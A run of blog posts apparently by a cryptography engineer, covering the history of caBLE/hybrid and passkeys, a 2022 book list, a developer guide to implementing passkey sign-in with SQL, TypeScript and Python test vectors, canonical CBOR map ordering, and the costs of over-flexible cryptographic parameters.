The next attempt was called caBLEv2. Given all the issues with BLE in the previous iteration, caBLEv2 was designed to use the least amount of Bluetooth possible: a single advert sent from the phone to the desktop. This means that the rest of the communication went over the internet, which requires that both phone and desktop have an internet connection. This is unfortunate, but there were no other viable options. Using Bluetooth Classic presents a host of problems, and BLE L2CAP does not work from user space on Windows.

Still, using Bluetooth somewhere in the protocol is critical because it proves proximity between the two devices. If all communication was done over the Internet, then the phone has no proof that the computer it is sending the assertion to is nearby. It could be an attacker’s computer on the other side of the world. But if we can send one Bluetooth message from the phone and make the computer prove that it has received it, then all other communication can be routed over the Internet. And that is what caBLEv2 does.

It also changed the relationship between the parties. While caBLEv1 required that a key be shared between the website and the phone, caBLEv2 was a relationship between a computer and a phone. This made some user flows less smooth, but it made it much easier for smaller websites to take advantage of the capability.

In practice, caBLEv2 has worked far better, although Bluetooth problems still occur. (And not every desktop has Bluetooth.)

A caBLEv2 transaction is often triggered by a browser showing a QR code. That QR code contains a public key for the browser and a shared secret. When a phone scans it, it starts sending a BLE advert that is encrypted with the shared secret and which contains a nonce and the location of an internet server that communication can be routed through. The desktop decrypts this advert, connects to that server (which forwards messages to the phone and back), and starts a cryptographic handshake to prove that it holds the keys from the QR code and that it received the BLE advert. Once that communication channel is established, CTAP2 is run over it so that the phone can be used as an authenticator.

caBLEv2 also allows the phone to send information to the desktop that allows the desktop to contact it in the future without scanning a QR code. This depends on that same internet service, which must be able to send a notification to the phone, rather than constant BLE listening. (Although a BLE advert is sent for every transaction to prove proximity.) 

But ultimately, while the name caBLE was cute, it was also confusing. And so FIDO renamed it to “hybrid” when it was included in CTAP 2.2. So you’ll now see this called “hybrid CTAP” and the transport name in WebAuthn is hybrid.

The WebAuthn-family of APIs

WebAuthn is a web API, but people also use their computers and phones outside of a web browser sometimes. So while these contexts can’t use WebAuthn itself, a number of APIs for native apps that are similar to WebAuthn have popped up. These APIs aren’t WebAuthn, but if they produce signed messages in the same format as WebAuthn, a backend server needn’t know the difference. It’s a term that I’ve made up, but I call them “WebAuthn-family” APIs.

On Windows, webauthn.dll is a system service that reproduces most of WebAuthn for apps. (Browsers on Windows use this to implement WebAuthn, so it has to be pretty complete.) On iOS and macOS, Authentication Services does much the same. On Android, Credential Manager allows apps to pass in JSON-encoded WebAuthn requests and get JSON responses back. WebAuthn Level Three also includes support for the same JSON encoding so that backends should seamlessly be able to handle sign-ins from the web and Android apps. (WebAuthn should never have used ArrayBuffers.)

Passkeys

With hybrid and platform authenticators, people had lots of access to WebAuthn authenticators. But if you reset or lost your phone/laptop you still lost all of your credentials, same as if you reset or lost a security key. In an enterprise situation, losing a security key is resolved by going to the helpdesk. In a personal context, the advice had long been to register at least two security keys and to keep one of them locked away in a safe. But it’s awfully inconvenient to register a security key everywhere when it’s locked in a safe. So while this advice worked for protecting a tiny number of high-value accounts, if WebAuthn credentials were ever going to make a serious dent in the regular authentication ecosystem, they had to do better.

“Better” has to mean “recoverable”. People do lose and reset their phones, and so a heretofore sacred property of FIDO would have to be relaxed so that it could expand its scope beyond enterprises and experts: private keys would have to be backed up.

In 2021, with iOS 15, Apple included the ability to save WebAuthn private keys into iCloud Keychain, and Android Play Services got support for hybrid. At the end of 2022, iOS 16 added support for hybrid and, on Android, Google Password Manager added support for backing up and syncing private keys.

People now had common access to authenticators, the ability to assert credentials across devices with them, and fair assurance that they could recover those credentials. To bundle that together and give it a more friendly name, Apple introduced better branding: passkeys.

With passkeys, the world now has a widely available authentication mechanism that isn’t subject to phishing, isn’t subject to password reuse nor credential stuffing, can’t be sniffed and replayed by malicious 3rd-party JavaScript on the website, and doesn’t cause a mess when the server-side password database leaks.

There is some ambiguity about the definition of passkeys. Passkeys are synced, discoverable WebAuthn credentials. But we don’t want to exclude people who really want to use a security key, so if you would like to create a credential on a security key, we assume you know what you’re doing and the UI will refer to them as passkeys even though they aren’t synced. Also, we’re still building the ecosystem of syncing, which is quite fragmented presently: Windows Hello doesn’t sync at all, Google Password Manager can only sync between Android devices, and iCloud Keychain only works on Apple devices. So there is a fair chance that if you create a credential that gets called a passkey, it might not actually be backed up anywhere. So the definition is a little bit aspirational for the moment, but we’re working on it.

Another feature that came with the introduction of passkeys was integration into browser autofill. (This is also called “conditional UI” because of the name of a value in the W3C credential management spec.) So websites can now opt to have passkeys listed in autofill, as passwords are. This is not a long-term design! It would be weird if in 20 years websites had to have a pair of text boxes on their front page for signing in, in the same way that we use an icon of a floppy disk to denote saving. But conditional UI hopefully makes it much easier for websites to adopt passkeys, given that they are starting with a user base that is 100% password users.

If you want to understand how passkey support works on a website, see here. But remember that the core concepts stretch back to U2F: passkeys are still partitioned by an RP ID, they still have credential IDs, and there’s still the client data containing a server-provided challenge.

The future

The initial launch of passkeys didn’t have any provision for third-party password managers. On iOS and macOS, you had to use iCloud Keychain, and on Android you had to use Google Password Manager. That was expedient but never the intended end state, and with iOS 17 and Android 14, third-party password managers can save and provide passkeys.

At the time of writing, in 2023, most of the work is in building out the ecosystem that we have sketched. Passkeys need to sync to more places, and third-party password manager support needs to get fleshed out.

There are a number of topics on the horizon, however. With FIDO2, CTAP, and WebAuthn, we are asking websites to trust password managers a lot more. While password managers have long existed, usage is far from universal. But with FIDO2, by design, users have to use a password manager. We are also suggesting that with passkeys, websites might not need to use a second authentication factor. Two-factor authentication has become commonplace, but that’s because the first factor (the password) was such rubbish. With passkeys, that’s no longer the case. That brings many benefits! But it means that websites are outsourcing their authentication to password managers, and some would like some attestation that they’re doing a good job.

Next, the concept of an RP ID is central to passkeys, but it’s a very web-centric concept. Some services are mobile-only and don’t have a strong brand in the form of a domain name. But passkeys are forever associated with an RP ID, which forces apps to commit to the domain name that might well appear in the UI.

The purpose of the RP ID was to stop credentials from being shared across websites and thus becoming a tracking vector. But now that we have a more elaborate UI, perhaps we could show the user the places where credentials are being used and let the RP ID be a hash of a public key, or something else not tied to DNS.

We also need to think about the problem of users transitioning between ecosystems. People switch from Android to iOS and vice versa, and they should be able to bring their passkeys along with them.

There is a big pile of corpses labeled “tried to replace passwords”. Passkeys are the best attempt so far. Here's hoping that in five years’ time, that they’re not a cautionary tale.

Books, 2022

As Twitter is having a thing (agl@infosec.exchange, by the way) it's nice that RSS is still ticking along. To mark that fact as we reach the end of the year, I decided to write up a list of books that I've read in the past 12 months that feel worthy of recommendation to a general audience.

Flying Blind

Boeing was once a standard-bearer for American engineering and manufacturing abilities and now it's better known for the groundings of the 737 MAX 8 and 787. This is a history of how Boeing brought McDonnell Douglas and found that it contained lethal parasites.

Electrify

Burning things produces CO2 and air pollution. Both slowly hurt people so we should stop doing it where possible. This is a data-filled book on how to get a long way towards that goal, and is an optimistic respite from some of the other books on this list.

The Splendid & The Vile

Do we really need another book about WWII? Perhaps not, but I enjoyed this one which focuses on the members of the Churchill family in the first couple of years of the war.

Transformer

Ignorant as I am about microbiology, I love Nick Lane books because they make me feel otherwise and I cross my fingers that they're actually accurate. This book is avowedly presenting a wild theory—which is probably false—but is a wonderful tour of the landscape either way.

Stuff Matters

A pop-science book, but a good one that focuses on a number of materials in the modern world. If you know anything about the topic, this is probably too light-weight. But if, like me, you know little, it's a fun introduction.

Amusing Ourselves to Death

This is a book from 1985 about the horrors of television. Its arguments carry more force when transposed to the modern internet but are also placed into a larger context because they were made 40 years ago and TV hasn't destroyed civilisation (… probably).

The Story of VaccinateCA

I'm cheating: this isn't a book, although it is quite long. As we collectively fail to deal with several slow crises, here's a tale of what failed and what succeeded in a recent short, sharp crisis. It is very California focused, and less useful to those outside of America, but I feel that it's quite important.

Art of Computer Programming, Satisfiability

This isn't “general audience”, but if you read this far perhaps neither are you. SMT solvers are volatile magic and, while this is only about SAT, it's a great introduction to the area. I would love to say that I read it in the depth that it deserves, but even skimming the text and skipping the exercises is worth a lot.

The Economist also has its books of the year list. I've only read one of them, Slouching Towards Utopia, and it didn't make my list above!

Passkeys

This is an opinionated, “quick-start” guide to using passkeys as a web developer. It’s hopefully broadly applicable, but one size will never fit all authentication needs and this guide ignores everything that’s optional. So take it as a worked example, but not as gospel.

It doesn't use any WebAuthn libraries, it just assumes that you have access to functions for verifying signatures. That mightn't be optimal—maybe finding a good library is better idea—but passkeys aren't so complex that it's unreasonable for people to know what's going on.

This is probably a post that'll need updating over time, making it a bad fit for a blog, so maybe I'll move it in the future. But it's here for now.

Platforms for developing with passkeys include:

Database changes

Each user will need a passkey user ID. The user ID identifies an account, but should not contain any personally identifiable information (PII). You probably already have a user ID in your system, but you should make one specifically for passkeys to more easily keep it PII-free. Create a new column in your users table and populate it with large random values for this purpose. (The following is in SQLite syntax so you’ll need to adjust for other databases.)

/* SQLite can't set a non-constant DEFAULT when altering a table, only
 * when creating it, but this is what we would like to write. */
ALTER TABLE users ADD COLUMN passkey_id blob DEFAULT(randomblob(16));

/* The CASE expression causes the function to be non-constant. */
UPDATE USERS SET passkey_id=hex(randomblob(CASE rowid WHEN 0
                                                      THEN 16
                                                      ELSE 16 END));

A user can only have a single password but can have multiple passkeys. So create a table for them:

CREATE TABLE passkeys (
  id BLOB PRIMARY KEY,
  username STRING NOT NULL,
  public_key_spki BLOB,
  backed_up BOOLEAN,
  FOREIGN KEY(username) REFERENCES users(username));

Secure contexts

Nothing in WebAuthn works outside of a secure context, so if you’re not using HTTPS, go fix that first.

Enrolling existing users

When a user signs in with a password, you might want to prompt them to create a passkey on the local device for easier sign-in next time. First, check to see if their device has a local authenticator and that the browser is going to support passkeys:

if (!window.PublicKeyCredential ||
    !(PublicKeyCredential as any).isConditionalMediationAvailable) {
  return;
}

Promise.all([
    (PublicKeyCredential as any).isConditionalMediationAvailable(),
    PublicKeyCredential
      .isUserVerifyingPlatformAuthenticatorAvailable()])
  .then((values) => {
    if (values.every(x => x === true)) {
      promptUserToCreatePlatformCredential();
    }
  })

(The snippets here are in TypeScript. It should be easy to convert them to plain Javascript if that’s what you need. You might notice several places where TypeScript’s DOM types are getting overridden because lib.dom.d.ts hasn’t caught up. I hope these cases will disappear in time.)

If the user accepts, ask the browser to create a local credential:

var createOptions : CredentialCreationOptions = {
  publicKey: {
    rp: {
      // The RP ID. This needs some thought. See comments below.
      id: SEE_BELOW,
      // This field is required to be set to something, but you can
      // ignore it.
      name: "",
    },

    user: {
      // `userIdBase64` is the user's passkey ID, from the database,
      // base64-encoded.
      id: Uint8Array.from(atob(userIdBase64), c => c.charCodeAt(0)),
      // `username` is the user's username. Whatever they would type
      // when signing in with a password.
      name: username,
      // `displayName` can be a more human name for the user, or
      // just leave it blank.
      displayName: "",
    },

    // This lists the ids of the user's existing credentials. I.e.
    //   SELECT id FROM passkeys WHERE username = ?
    // and supply the resulting list of values, base64-encoded, as
    // existingCredentialIdsBase64 here.
    excludeCredentials: existingCredentialIdsBase64.map(id => {
      return {
        type: "public-key",
        id: Uint8Array.from(atob(id), c => c.charCodeAt(0)),
      };
    }),

    // Boilerplate that advertises support for P-256 ECDSA and RSA
    // PKCS#1v1.5. Supporting these key types results in universal
    // coverage so far.
    pubKeyCredParams: [{
      type: "public-key",
      alg: -7
    }, {
      type: "public-key",
      alg: -257
    }],

    // Unused during registrations, except in some enterprise
    // deployments. But don't do this during sign-in!
    challenge: new Uint8Array([0]),

    authenticatorSelection: {
      authenticatorAttachment: "platform",
      requireResidentKey: true,
    },

    // Three minutes.
    timeout: 180000,
  }
};

navigator.credentials.create(createOptions).then(
  handleCreation, handleCreationError);

RP IDs

There are two levels of controls that prevent passkeys from being used on the wrong website. You need to know about this upfront to prevent getting stuck later.

“RP” stands for “relying party”. You (the website) are a “relying party” in authentication-speak. An RP ID is a domain name and every passkey has one that’s fixed at creation time. Every passkey operation asserts an RP ID and, if a passkey’s RP ID doesn’t match, then it doesn’t exist for that operation.

This prevents one site from using another’s passkeys. A passkey with an RP ID of foo.com can’t be used on bar.com because bar.com can’t assert an RP ID of foo.com. A site may use any RP ID formed by discarding zero or more labels from the left of its domain name until it hits an eTLD. So say that you’re https://www.foo.co.uk: you can assert www.foo.co.uk (discarding zero labels), foo.co.uk (discarding one label), but not co.uk because that hits an eTLD. If you don’t set an RP ID in a request then the default is the site’s full domain.

Our www.foo.co.uk example might happily be creating passkeys with the default RP ID but later decide that it wants to move all sign-in activity to an isolated origin, https://accounts.foo.co.uk. But none of the passkeys could be used from that origin! If would have needed to create them with an RP ID of foo.co.uk in the first place to allow that.

But you might want to be careful about always setting the most general RP ID because then usercontent.foo.co.uk could access and overwrite them too. That brings us to the second control mechanism. As you’ll see later, when a passkey is used to sign in, the browser includes the origin that made the request in the signed data. So accounts.foo.co.uk would be able to see that a request was triggered by usercontent.foo.co.uk and reject it, even if the passkey’s RP ID allowed usercontent.foo.co.uk to use it. But that mechanism can’t do anything about usercontent.foo.co.uk being able to overwrite them.

So either pick an RP ID and put it in the “SEE BELOW” placeholder, above. Or else don’t include the rp.id field at all and use the default.

Recording a passkey

When the promise from navigator.credentials.create resolves successfully, you have a newly created passkey! Now you have to ensure that it gets recorded by the server.

The promise will result in a PublicKeyCredential object, the response field of which is an AuthenticatorAttestationResponse. First, sanity check some data from the browser. Since this data isn’t signed over in the configuration that we’re using, it’s fine to do this check client-side.

const cdj = JSON.parse(
    new TextDecoder().decode(cred.response.clientDataJSON));
if (cdj.type != 'webauthn.create' ||
    (('crossOrigin' in cdj) && cdj.crossOrigin) ||
    cdj.origin != 'https://YOURSITEHERE') {
  // handle error
}

Call getAuthenticatorData() and getPublicKey() on response and send those ArrayBuffers to the server.

At the server, we want to insert a row into the passkeys table for this user. The authenticator data is a fairly simple, binary format. Offset 32 contains the flags byte. Sanity check that bit 7 is set and then extract:

  1. Bit 4 as the value of backed_up. (I.e. (authData[32] >> 4) & 1.)
  2. The big-endian, uint16 at offset 53 as the length of the credential ID.
  3. That many bytes from offset 55 as the value of id.

The ArrayBuffer that came from getPublicKey() is the value for public_key_spki. That should be all the values needed to insert the row.

Handling a registration exception

The promise from create() might also result in an exception. InvalidStateError is special and means that a passkey already exists for the local device. This is not an error, and no error will have been shown to the user. They’ll have seen a UI just like they were registering a passkey but the server doesn’t need to update anything.

NotAllowedError means that the user canceled the operation. Other exceptions mean that something more unexpected happened.

To test whether an exception is one of these values do something like:

function handleCreationError(e: Error) {
  if (e instanceof DOMException) {
    switch (e.name) {
      case 'InvalidStateError':
        console.log('InvalidStateError');
        return;

      case 'NotAllowedError':
        console.log('NotAllowedError');
        return;
    }
  }

  console.log(e);
}

(But obviously don’t just log them to the console in real code.)

Signing in with autocomplete

Somewhere on your site you have username & password inputs. On the username input element, add webauthn to the autocomplete attribute. So if you have:

<input type="text" name="username" autocomplete="username">

… then change that to …

<input type="text" name="username" autocomplete="username webauthn">

Autocomplete for passkeys works differently than for passwords. For the latter, when the user selects a username & password from the pop-up, the input fields are filled for them. Then they can click a button to submit the form and sign in. With passkeys, no fields are filled, but rather a pending promise is resolved. It’s then the site’s responsibility to navigate/update the page so that the user is signed in.

That pending promise must be set up by the site before the user focuses the username field and triggers autocomplete. (Just adding the webauthn tag doesn’t do anything if there’s not a pending promise for the browser to resolve.) To create it, run a function at page load that:

  1. Does feature detection and, if supported,
  2. Starts a “conditional” WebAuthn request to produce the promise that will be resolved if the user selects a credential.

Here’s how to do the feature detection:

if (!window.PublicKeyCredential ||
    !(PublicKeyCredential as any).isConditionalMediationAvailable) {
  return;
}

(PublicKeyCredential as any).isConditionalMediationAvailable()
  .then((result: boolean) => {
    if (!result) {
      return;
    }

    startConditionalRequest();
  });

Then, to start the conditional request:

var getOptions : CredentialRequestOptions = {
  // This is the critical option that tells the browser not to show
  // modal UI.
  mediation: "conditional" as CredentialMediationRequirement,

  publicKey: {
    challenge: Uint8Array.from(atob(CHALLENGE_SEE_BELOW), c =>
                                 c.charCodeAt(0)),

    rpId: SAME_AS_YOU_USED_FOR_REGISTRATION,
  }
};

navigator.credentials.get(getOptions).then(
  handleSignIn, handleSignInError);

Challenges

Challenges are random values, generated by the server, that are signed over when using a passkey. Because they are large random values, the server knows that the signature must have been generated after it generated the challenge. This stops “replay” attacks where a signature is captured and used multiple times.

Challenges are a little like a CSRF token: they should be large (16- or 32-byte), cryptographically-random values and stored in the session object. They should only be used once: when a sign-in attempt is received, the challenge should be invalidated. Future sign-in attempts will have to use a fresh challenge.

The snippet above has a value CHALLENGE_SEE_BELOW which is assumed to be the base64-encoded challenge for the sign-in. The sign-in page might XHR to get the challenge, or the challenge might be injected into the page’s template. Either way, it must be generated at the server!

Handling sign-in

If the user selects a passkey then handle­Sign­In will be called with a Public­Key­Credential object, the response field of which is a Authenticator­Assertion­Response. Send the Array­Buffers raw­Id, response.­client­Data­JSON, response.­authenticator­Data, and response.­signature to the server.

At the server, first look up the passkey: SELECT (username, public_key_spki, backed_up) FROM passkey WHERE id = ? and give the value of rawId for matching. The id column is a primary key, so there can either be zero or one matching rows. If there are zero rows then the user is signing in with a passkey that the server doesn’t know about—perhaps they deleted it. This is an error, reject the sign-in.

Otherwise, the server now knows the claimed username and public key. To validate the signature you’ll need to construct the signed data and parse the public key. The public_key_spki values from the database are stored in SubjectPublicKeyInfo format and most languages will have some way to ingest them. Here are some examples:

Your languages’s crypto library should provide a function that takes a signature and some signed data and tells you whether that signature is valid for a given public key. For the signature, pass in the value of the signature ArrayBuffer that the client sent. For the signed data, calculate the SHA-256 hash of clientDataJSON and append it to the contents of authenticatorData. If the signature isn’t valid, reject the sign-in.

But there are still a bunch of things that you need to check!

Parse the clientDataJSON as UTF-8 JSON and check that:

  1. The type member is “webauthn.get”.
  2. The challenge member is equal to the base64url encoding of the challenge that the server gave for this sign-in.
  3. The origin member is equal to your site’s sign-in origin (e.g. a string like “https://www.example.com”).
  4. The crossOrigin member, if present, is false.

There’s more! Take the authenticatorData and check that:

  1. The first 32 bytes are equal to the SHA-256 hash of the RP ID that you’re using.
  2. That bit zero of the byte at offset 32 is one. I.e. (authData[32] & 1) == 1. This is the user presence bit that indicates that a user approved the signature.

If all those checks work out then sign in the user whose passkey it was. I.e. set a cookie and respond to the running Javascript so that it can update the page.

If the stored value of backed_up is not equal to (authData[32] >> 4) & 1 then update that in the database.

Removing passwords

Once a user is using passkeys to sign in, great! But if they were upgraded from a password then that password is hanging around on the account, doing nothing useful yet creating risk. It would be good to ask the user about removing the password.

Doing this is reasonable if the account has a backed-up passkey. I.e. if SELECT 1 FROM passkeys WHERE username = ? AND backed_up = TRUE has results. A site might consider prompting the user to remove the password on an account when they sign in with a passkey and have a backed-up one registered.

Registering new, passkey-only users

For sign ups of new users, consider making them passkey-only if the feature detection (from the section on enrolling users) is happy.

When enrolling users where a passkey will be their only sign-in method you really want the passkey to end up “in their pocket”, i.e. on their phone. Otherwise they could have a passkey on the computer that they signed-up with but, if it’s not syncing to their phone, that’s not very convenient. There is not, currently, a great answer for this I’m afraid! Hopefully, in a few months, calling navigator­.credentials.­create() with authenticator­Selection.­authenticator­Attachment set to cross-plat­form will do the right thing. But with iOS 16 it’ll exclude the platform authenticator.

So, for now, do that on all platforms except for iOS/iPadOS, where authenticator­Attachment should continue to be plat­form.

(I’ll try and update this section when the answer is simplier!)

Settings

If you’ve used security keys with any sites then you’ll have noticed that they tend to list registered security keys in their account settings, have users name each one, show the last-used time, and let them be individually removed. You can do that with passkeys too if you like, but it’s quite a lot of complexity. Instead, I think you can have just two buttons:

First, a button to add a passkey that uses the createOptions object from above, but with authenticatorAttachment deleted in order to allow other devices to be registered.

Second, a “reset passkeys” button (like a “reset password” button). It would prompt for a new passkey registration, delete all other passkeys, and invalidate all other active sessions for the user.

Test vectors

Connecting up to your language’s crypto libraries is one of the trickier parts of this. To help, here are some test vectors to give you a ground truth to check against, in the format of Python 3 code that checks an assertion signature.

import codecs

from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.serialization import (
  load_der_public_key)

# This is the public key in SPKI format, as obtained from the
# `getPublicKey` call at registration time.
public_key_spki_hex = '''
3059301306072a8648ce3d020106082a8648ce3d03010703420004dfacc605c6
e1192f4ab89671edff7dff80c8d5e2d4d44fa284b8d1453fe34ccc5742e48286
d39ec681f46e3f38fe127ce27c30941252430bd373b0a12b3e94c8
'''

# This is the contents of the `clientDataJSON` field at assertion
# time. This is UTF-8 JSON that you also need to validate in several
# ways; see the main body of the text.
client_data_json_hex = '''
7b2274797065223a22776562617574686e2e676574222c226368616c6c656e67
65223a22594934476c4170525f6653654b4d455a444e36326d74624a73345878
47316e6f757642445a483664436141222c226f726967696e223a226874747073
3a2f2f73656375726974796b6579732e696e666f222c2263726f73734f726967
696e223a66616c73657d
'''

# This is the `authenticatorData` field at assertion time. You also
# need to validate this in several ways; see the main body of the
# text.
authenticator_data_hex = '''
26bd7278be463761f1faa1b10ab4c4f82670269c410c726a1fd6e05855e19b46
0100000cc7
'''

# This is the signature at assertion time.
signature_hex = '''
3046022100af548d9095e22e104197f2810ee9563135316609bc810877d1685b
cff62dcd5b022100b31a97961a94b4983088386fd2b7edb09117f4546cf8a5c1
732420b2370384fd
'''

def from_hex(h):
    return codecs.decode(h.replace('\n', ''), 'hex')

def sha256(m):
    digest = hashes.Hash(hashes.SHA256())
    digest.update(m)
    return digest.finalize()

# The signed message is calculated from the authenticator data and
# clientDataJSON, but the latter is hashed first.
signed_message = (from_hex(authenticator_data_hex) +
                  sha256(from_hex(client_data_json_hex)))

public_key = load_der_public_key(from_hex(public_key_spki_hex))
public_key.verify(from_hex(signature_hex),
                  signed_message,
                  ec.ECDSA(hashes.SHA256()))
# `verify` throws an exception if the signature isn't valid.
print('ok')

Where to ask questions

StackOverflow is a reasonable place, with the passkey tag.

Passkeys

The presentations are out now (Google I/O, WWDC): we're making a push to take WebAuthn to the masses.

WebAuthn has been working reasonably well for enterprises and technically adept users. But we were not going to see broad adoption while the model was that you had to purchase a pair of security keys, be sure to register the backup on every site, yet also keep it in a fire safe. So the model for consumers replaces security keys with phones, and swaps out having a backup authenticator with backing up the private keys themselves. This could have been a different API, but it would have been a lot to have a second web API for public-key authentication, so WebAuthn it is. Basing things on WebAuthn also means that you can still use your security key if you like*, and hopefully with a expanded ranges of sites.

(* albeit not with Android this year, because it doesn't support a recent enough version of CTAP yet. Sorry.)

The WebAuthn spec is not a gentle introduction, but you can find several guides on how to make the API calls. Probably there'll be more coming. What I wanted to cover in this post is the groundwork semantics around passkeys. These are not new if you're fully versed in WebAuthn, but they are new if you've only used WebAuthn in a 2nd-factor context.

I'll probably build on this in some future posts and maybe amalgamate some past writings into a single document. The next paragraph just drops you into things without a lot of context. Perhaps it'll be useful for someone, but best to understand it as fragments of a better document that I'm accumulating.

Ok:

An authenticator is a map from (RP ID, user ID) pairs, to public key credentials. I'll expand on each of those terms:

An authenticator, traditionally, is the physical thing that holds keys and signs stuff. Security keys are authenticators. Laptops can be too; Windows Hello has been an authenticator for a while now. In the world of passkeys, phones are important authenticators. Now that keys may sync, you might consider the sync account itself to be a distributed authenticator. So, rather than thinking of authenticators as physical things, think of it as whatever maintains this map that contains the user's credentials.

An RP ID identifies a website. It's a string that contains a domain name. (In non-web cases, like SSH, it can be a URL, but I'm not covering them here.) A website can use an RP ID if that RP ID is equal to, or a suffix of, the site's domain, and the RP ID is at least an eTLD + 1. So https://foo.bar.example.com can use RP IDs foo.bar.example.com, bar.example.com, and example.com, but not com (because that's less than an eTLD + 1), nor example.org (because that's an unrelated domain). Because the credential map is keyed by RP ID, one website can't use another's credentials. However, be conscious of subdomains: usercontent.example.com can use an RP ID of example.com, although the client data will let the server know which origin made any given request.

Next, a user ID is an opaque byte string that identifies an account on a website. The spec says that it mustn't contain identifiable information (i.e. don't just make it the user's email address) because security keys don't protect the user ID to the same degree that they protect other information. The recommendation is to add a column to your users table, generate a large random value on demand, and store it there for each user. (The spec says 64 bytes but if you just generated 16 from a secure random source, I think you would be fine.) You could also HMAC an internal user ID, although that concentrates risk in that HMAC key.

Recall that an authenticator maps (RP ID, user ID) pairs to credentials? The important consequence is that if a site creates a credential it'll overwrite any existing credential with the same user ID. So an authenticator only contains a single credential for a given account. (For those who know WebAuthn already: I'm assuming discoverable credentials throughout.)

A credential is a collection of various fields. Most obviously a private key, but also metadata: the RP ID, for one, and user information. There's three pieces of user information: the user name, display name, and ID. We've covered the user ID already. The other two are free-form strings that get displayed in UI to help a user select a credential. The user name is generally how a user identifies themselves to the site, e.g. an email address. The display name is how the user would want to be addressed, which could be their legal name. Of the two, the user name will likely be more prominent in UIs.

Lastly a passkey is a WebAuthn credential that is safe and available when the user needs it, i.e. backed up. Not all implementations will be backing up credentials right away and passkeys on those platforms can be called “single-device passkeys”, which is a little awkward, but so's the lack of backup.

Another important aspect of the structure of things is that, while an account only has a single password, it can have multiple passkeys. That's because passkeys can't be copy–pasted around like passwords can. Instead users will register a passkeys as needed to cover their set of devices.

The authenticatorAttachment field in the assertion structure hints to the website about when an additional passkey might be needed. If the value of that field is cross-platform then the user had to use another device to sign-in and it might be worth asking them if they want to register the local device.

When there are multiple passkeys registered on a site, users will need to manage them. The way that sites have often ended up managing 2nd-factor WebAuthn credentials is via an explicit list in the user's account settings. Usually the user will be prompted to name a credential at registration time to distinguish them. That's still a reasonable way to manage passkeys if you like. (We pondered whether browsers could send a passkey “name” at registration time to avoid prompting the user for one but, in a world of syncing, there doesn't seem to be a good value that isn't either superfluously generic, e.g. “Google devices”, or a privacy problem, e.g. the sync account identifier).

If prompting for names and having an explicit list seems too complex then I think it would also be fine to simply have a reset button that a) registers a new passkey, b) deletes every other passkey on the account, and c) signs out all other sessions. I.e. a button that mirrors a password reset flow. For a great many sites, that would work well.

We don't want passwords to hang around on an account forever as a neglected weak-link. In order to guide sites in determining when that might be worth prompting the user to remove their password, there's a new backup state bit in the authenticator data that the server gets with each authentication. If it's set then the passkey will survive the loss of the device. (Unless the device is destroyed after creating the passkey but before managing to sync. But that's the same as generating a random password in a password manager.)

There are not firm rules around using that bit, but once the user has a backed up passkey on a portable authenticator then it's probably time to ask about dropping the password. Sites can know this when they see a creation or assertion operation with the backup state bit set and either the attachment is cross-platform, or it's platform but that platform is a mobile device. That's a conservative set of rules because, for example, a credential created on a MacBook might get synced to the user's iPhone. But maybe that user doesn't have an iPhone.

As you can see, one of the challenges with passkeys is the complexity! Several teams are Google are still working on fleshing out the things demoed at I/O but we know that good guidance will be important. In the mean time, I'm happy to answer questions over Twitter and am pondering if public office hours would be helpful too.

The several canons of CBOR

There are many encoding formats. CBOR is one of them. Like several others, a subset of it basically fine—I'm not starting that fight today.

Whatever encoding you use, it's nice to reduce flexibility. If there are multiple ways of encoding the same thing then, for anything with a non-negligible diversity of implementations, you'll find that there is a canonical encoding, it's just not documented. As soon as one implementation tries using a valid, but less common encoding, it'll find that it doesn't work and something will change to sort it all out. But that process of eventual coordination is expensive—better to do it explicitly and up-front.

For example, TCP options are chunks of tag–length–value and the spec doesn't define any restriction on their ordering. That didn't stop me blowing up a Ubuntu release because a change of mine happened to alter the order that Linux sent them, and some DSL modems dropped packets when options came in that order. That's an expensive discovery of an implicit canonicalisation rule.

If you're using CBOR then RFC 7049 has a section titled “Canonical CBOR”. One of the things it defines is how to order map elements. Great! No more TCP options messes. You can read that section for yourself, but one interpretation of the words there is what I'll call the three-step ordering for map keys:

  1. Lowest valued types come first then, within each type,
  2. Shortest encoded key comes first then, within consecutive keys with equal lengths,
  3. Sort lexicographically.

However, there is another interpretation of the same section which I'll call the two-step ordering. It drops the first step, i.e. doesn't sort by types. When I first read that section, I certainly came away with only one interpretation, but I can somewhat see how the other arises.

CTAP, the protocol for talking to security keys, uses CBOR a lot and explicitly picks the three-step ordering. An errata was eventually raised against the RFC to “clarify” that the three-step order was correct, but it was rejected as a semantic change. So perhaps that's an official ruling that two-step was the correct understanding?

It only matters if you mix different types of keys in the same map, and sometimes you don't, so maybe it's moot for you. (But keep in mind that negative and non-negative numbers are different types in CBOR.) Anyway, the IETF revised the CBOR RFC to firmly clarify the issue add a third option:

RFC 7049 is obsoleted by 8949. The old “Canonical CBOR” section is replaced by “Core Deterministic Encoding Requirements” and that specifies what I'll have to call the one-step ordering:

  1. Sort lexicographically on the encoded key.

It has some advantages! Like, why was it ever more complicated than that in the first place? But it was, and now there's two (or three) orderings. The two-step ordering even has a subsection of its own in the new RFC and a note saying that it “could be called Old Canonical CBOR”. If only shipped implementations were as changeable as the X-Men universe.

So that's why there's two and half “canonical” CBORs and now I have something that I can reference when people ask me about this.

Update: Someone on Twitter (Thomas Duboucher, perhaps? Sorry, I lost the tweet!) pointed out that the 1- and 3-step ordering give the same results in many cases. Having thought about it, that's correct! As long as you don't use maps, arrays, or tagged values as map keys, I believe they coincide. For something like CTAP2, where map keys are always ints or strings, they work out the same. So perhaps things aren't so bad. (Or perhaps a really subtle difference is worse! Time will tell.)

Picking parameters

When taking something from cryptographic theory into practice, it's very important to pick parameters. I don't mean picking the right parameters — although that certainly helps. I mean picking parameters at all.

That might seem obvious, but there are pressures pushing towards abdication: what if you get it wrong? Why not hedge bets and add another option? What about the two groups who already shipped something? We could just add options so that everyone's happy.

There are always exceptions, but the costs of being flexible are considerable. ANSI X9.62, from 1998, specified how elliptic curves were encoded in ASN.1 and included not just 27 possible curves, but allowed the parameters to be inherited from the issuing CA and allowed completely arbitrary elliptic curves to be defined inside a public key. That specifies almost nothing and avoids really standardising on anything. Thankfully I've not seen parameter inheritance implemented for ECC (it would be a security mess) but support for custom elliptic curves does, sadly, exist.

A couple of years ago, Microsoft had a signature bypass because of support for arbitrary curves [details]. Today, OpenSSL had an infinite loop in certificate parsing because of the same. On the flip side, I'm not aware that anyone has ever used the ability to specify arbitrary curves for anything useful.

It's not fair to just blame X9.62: don't get me started about RSA PSS. The cost of having too many options is frequently underestimated. Why does AES-192 exist, for example, other than to inflate test matrices?

